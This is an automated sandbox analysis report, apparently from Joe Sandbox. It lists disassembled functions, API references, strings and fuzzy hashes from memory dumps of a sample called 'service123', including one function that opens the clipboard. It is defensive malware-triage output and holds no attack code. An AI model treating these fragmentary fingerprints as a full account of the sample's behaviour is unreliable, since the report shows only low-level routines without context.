Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 5707f062179f123059815737db96c84d7c54c7e61b08a75345588ef9ff9cd2e3
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: 8B21D7319D420ECFD711EE19C48199AF7A6AF86315B548A15ECA447A28D330E88B87E2

Function 6C309BA6 Relevance: 12.1, APIs: 8, Instructions: 86clipboardCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 6C309BA9
IsClipboardFormatAvailable.USER32 ref: 6C309DDC
OpenClipboard.USER32 ref: 6C309DF0

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: Clipboard$AvailableCloseFormatHandleOpen
String ID:
API String ID: 518195572-0
Opcode ID: 226c6ad28a6d8860c4d69bc01e3b6791c3d0d13136351017b681e8c8999d82c4
Instruction ID: 79b49d39420d71800a9723bfd50e82caec45c36e309b95d7e0fea622c4d47423
Opcode Fuzzy Hash: 226c6ad28a6d8860c4d69bc01e3b6791c3d0d13136351017b681e8c8999d82c4
Instruction Fuzzy Hash: B42131B2B082018FEB00BFB8D54A17EBBF4AB45355F040939D8C686A44EB36D458CF53

Function 00C11E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00C11EAF
signal.MSVCRT ref: 00C11EF6
signal.MSVCRT ref: 00C11F0F
signal.MSVCRT ref: 00C11F36
signal.MSVCRT ref: 00C11F72
signal.MSVCRT ref: 00C11FBF
signal.MSVCRT ref: 00C11FD5
signal.MSVCRT ref: 00C11FEB

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 77a8f5b56affb836bd395252ad787df63a36f67bacd0495136a3f6bfe29f897a
Instruction ID: 6c5947f5fb24860cb328df64e988cf9a0fe643909737cae37e46fc39c6f90278
Opcode Fuzzy Hash: 77a8f5b56affb836bd395252ad787df63a36f67bacd0495136a3f6bfe29f897a
Instruction Fuzzy Hash: D5311A709082008AE7206FE499443AE76D4AF47358F5D4909EED486281DB7DCAC9BB53

Function 00C14360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00C14378

Strings

@, xrefs: 00C14647
Inf, xrefs: 00C14E35, 00C14E4D
NaN, xrefs: 00C14D3B

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 324c132fac5225c737191eb24e522acb4d626ef3ace87327738bd41d671da877
Instruction ID: 792b6d50e64010bb3291d62e37e9213c9b62ec81c88ccd9144c507b07122b140
Opcode Fuzzy Hash: 324c132fac5225c737191eb24e522acb4d626ef3ace87327738bd41d671da877
Instruction Fuzzy Hash: E3F1B17560C3858BD7348F24C0507EBBBE2BF86314F148A1DE9DD87381D7359986AB82

Function 6C304A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C304A48

Strings

@, xrefs: 6C304D17
Inf, xrefs: 6C305505, 6C30551D
NaN, xrefs: 6C30540B

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: db2345f21485fb0801d4577d8e06bc355c267276d9e6f75e731e45d6b3aa541d
Instruction ID: 1ba72e763cb632071f761eb087828fb7e2b0e8e37a7ba321025da8812d286e0b
Opcode Fuzzy Hash: db2345f21485fb0801d4577d8e06bc355c267276d9e6f75e731e45d6b3aa541d
Instruction Fuzzy Hash: 57F1AE7270C3858BD721CF28C45039ABBE6AF85318F158A5DE9DC87781D7359A09CF86

Function 00C13160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 00C1342A
0, xrefs: 00C134C6

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: 98795c9645af27d1401eb42f6fa4487c3218057c73dc2b4ce5d80d9658d38853
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: 98C1AF71E002558BCB15CF6CC4847DDBBF1BF8A318F588259E864AB395D734EA82DB90

Function 6C303830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 6C303B96
@, xrefs: 6C303AFA

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: 263fcd8dd8ea96aeb80ccb7a2a6e14582c670e497a385206b3118347010c277d
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: 4CC16B72F046158BDB44CF6CC481B8DBBF5AF89318F198259E854AB785D335E845CF90

Function 6C31B810 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C31B836
memcmp.MSVCRT ref: 6C31B85A
memcmp.MSVCRT ref: 6C31B8CD
memcmp.MSVCRT ref: 6C31B93F

Part of subcall function 6C3BADB0: strlen.MSVCRT ref: 6C3BADBE

memcmp.MSVCRT ref: 6C31B9D7

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C31B881, 6C31B8F2, 6C31B965, 6C31B9FE, 6C31BA1A
basic_string::compare, xrefs: 6C31B879, 6C31B8EA, 6C31B95D, 6C31B9F6, 6C31BA12

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 3412b7836b5ac683debd568e07fd62cc4e9526019bf895b1d8718fa001144904
Instruction ID: f5a1391b094ca9b349fde7c7164242fc9afc71f6d826dbfe7debcb0cb64d95e0
Opcode Fuzzy Hash: 3412b7836b5ac683debd568e07fd62cc4e9526019bf895b1d8718fa001144904
Instruction Fuzzy Hash: 706159B66093119FC3049F29C9C195EBBE5BF88A48F55892DE5C887B11D371E840CF53

Function 6C317710 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C363320: memset.MSVCRT ref: 6C363365

strcmp.MSVCRT ref: 6C317771
strlen.MSVCRT ref: 6C31778C
strlen.MSVCRT ref: 6C3177D3
strlen.MSVCRT ref: 6C317844
strlen.MSVCRT ref: 6C3178B2

Strings

*, xrefs: 6C317990

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: 935dee75ae3f3377563aaea98d2316369e91b5e3b45849b7292c95ad6144a119
Instruction ID: f60f98036ee6464c785cc65f31fd14950ff9de0cfeae7144cf6e42c5635b5971
Opcode Fuzzy Hash: 935dee75ae3f3377563aaea98d2316369e91b5e3b45849b7292c95ad6144a119
Instruction Fuzzy Hash: 348147B5A096108FDB04EF29C49869EFBF5FF86308F04856DD8959BB14D735A809CF82

Function 6C2FE8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 71da4e19df3463f5a611646b1fc27a5707331813cce73770064c463e1371cae3
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: B451887058970E8FC712DF19C08065AF7E2BF89308F444A5AFCA89B754D730D90ACBA6

Function 6C2FE340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2FE487
WaitForSingleObject.KERNEL32 ref: 6C2FE4C8

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 710524b3e5d5eaf2892d3f7f4420384aed1a53b61a689375ef2dff00579e69e4
Instruction ID: 584fb0a2d56347b6d4b5b46b03fdac22594ef5d94282a2d92217cdcd19a8821e
Opcode Fuzzy Hash: 710524b3e5d5eaf2892d3f7f4420384aed1a53b61a689375ef2dff00579e69e4
Instruction Fuzzy Hash: 9851747078930A8FDB11EF39C58876ABBF5BB06309F10452CECA987B40D771E5468B92

Function 6C3001F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C300209
memcpy.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C30022D
malloc.MSVCRT ref: 6C300247
memset.MSVCRT ref: 6C300275
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: d4a1be6c2d00ff967c8b11b37f49145888bf2f4b8e8518f38a9d160a12b41dc3
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: FD1151B27057459FD700AF69D88589AF7E8EF44258F05897DD888C7B00E731D948CF62

Function 00C18120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00C1812C
GetProcAddress.KERNEL32 ref: 00C1814C
GetProcAddress.KERNEL32 ref: 00C1818B

Strings

msvcrt.dll, xrefs: 00C18125
__lc_codepage, xrefs: 00C18180
___lc_codepage_func, xrefs: 00C18144

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 0cf81d89a0e4b7807cdde56e7c250deec7a7e9d5bc17d88435b710452f1cb6a0
Instruction ID: 3af205fd62906d8d68dc2d3e3490e08b25b1019afd765ae4fd1c362f956b9e50
Opcode Fuzzy Hash: 0cf81d89a0e4b7807cdde56e7c250deec7a7e9d5bc17d88435b710452f1cb6a0
Instruction Fuzzy Hash: BEF06DF18092109F9B00BF396D043CF7AE0BB0B350F65853ADC85C7241EAB48589EBA3

Function 6C309171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C30917C
GetProcAddress.KERNEL32 ref: 6C30919C
GetProcAddress.KERNEL32 ref: 6C3091DB

Strings

___lc_codepage_func, xrefs: 6C309194
__lc_codepage, xrefs: 6C3091D0
msvcrt.dll, xrefs: 6C309175

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: a2ee820d781642f25561222ff989413b35e6346ef5ea2b94d8e221979327e974
Instruction ID: aaee30fbba6ba94d5f091a38052fd58b5ac88a00c15ee1f1db42d9e20e991243
Opcode Fuzzy Hash: a2ee820d781642f25561222ff989413b35e6346ef5ea2b94d8e221979327e974
Instruction Fuzzy Hash: BBF096B7B853018BAB00BF7C994B25A7BF4A609214F41053DD989C7601E331D410CFE3

Function 6C2FEA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: fe116ca529c5a9a6f23b12471737002675ddae84a30a09849e46594609669d71
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: 4FB01272ED932D8E4421697C0515094E21DA6173493445C43CCAA63D048323E48B4A63

Function 6C394AE0 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C39B8AE), ref: 6C394B63
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C39B8AE), ref: 6C394BA5

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: 57fdab9cd044ab20bde28258d59369e6ee2e0c859aef404ea94993ed79a95c2d
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: EE61E6B5A09701CFC714DF29D58061AFBE0AF99754F14892DE4EA8B760E731E844CF92

Function 6C390970 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C3292A3,00000003), ref: 6C3909ED
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C3292A3,00000003), ref: 6C390A2C

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: a65b80e866a037f9756e785ffc42c2a6ba3a85fe731f690144fe4e950a3ca66c
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: F961E3B4609742CFD704DF19C59061AFBE0AF99758F10891EE8E98BB61E731E844CF92

Function 6C392B90 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6C38736E), ref: 6C392C03

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C392D14, 6C392D71, 6C392DD6
string::string, xrefs: 6C392DCE
basic_string::_M_create, xrefs: 6C392C1A, 6C392CBA
basic_string::basic_string, xrefs: 6C392D0C, 6C392D69

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: 1978a095460ae9d49f9045c9457dea77e8b75efdea7abc4c32ef5702c38f8f31
Instruction ID: b5d03e83425a28967496ff3fca4c7758ad56bbe29db5e1ea8e42386bf2e36d45
Opcode Fuzzy Hash: 1978a095460ae9d49f9045c9457dea77e8b75efdea7abc4c32ef5702c38f8f31
